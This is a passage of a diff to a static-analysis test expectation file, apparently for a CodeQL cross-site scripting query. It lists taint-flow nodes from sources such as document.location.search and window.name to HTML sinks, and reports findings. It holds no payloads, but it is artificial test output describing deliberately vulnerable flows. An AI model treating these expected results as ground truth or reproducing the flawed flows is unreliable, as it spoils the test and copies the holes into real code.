semmle.label | String( ... n.href) | +| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... 
on.href | +| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | +| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | +| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | +| tooltip.jsx:6:11:6:30 | source | semmle.label | source | +| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | +| tooltip.jsx:10:25:10:30 | source | semmle.label | source | +| tooltip.jsx:11:25:11:30 | source | semmle.label | source | +| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | +| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | +| tooltip.jsx:22:11:22:30 | source | semmle.label | source | +| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | +| tooltip.jsx:23:38:23:43 | source | semmle.label | source | +| translate.js:6:7:6:39 | target | semmle.label | target | +| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | +| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | +| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| translate.js:7:42:7:47 | target | semmle.label | target | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | +| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | +| trusted-types.js:3:62:3:62 | x | semmle.label | x | +| trusted-types.js:3:67:3:67 | x | semmle.label | x | +| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | +| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | +| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | +| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | +| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | +| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst3.js:4:25:4:28 | data | semmle.label | data | +| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | +| tst3.js:5:26:5:29 | data | semmle.label | data | +| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | +| tst3.js:7:32:7:35 | data | semmle.label | data | +| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | +| tst3.js:9:37:9:40 | data | semmle.label | data | +| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | +| tst3.js:10:38:10:41 | data | semmle.label | data | +| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | +| tst.js:2:7:2:39 | target | semmle.label | target | +| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| typeahead.js:20:13:20:45 | target | semmle.label | target | +| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | +| typeahead.js:21:12:21:17 | target | semmle.label | target | +| typeahead.js:24:30:24:32 | val | semmle.label | val | +| typeahead.js:25:18:25:20 | val | semmle.label | val | +| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | +| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | +| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | +| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | +| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | +| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | +| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | +| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
    ' | +| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | +| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | +| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | +| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | +| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | +| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | +| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | subpaths | optionalSanitizer.js:34:28:34:35 | tainted2 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... 
.search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | -#select -| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | -| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | -| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | 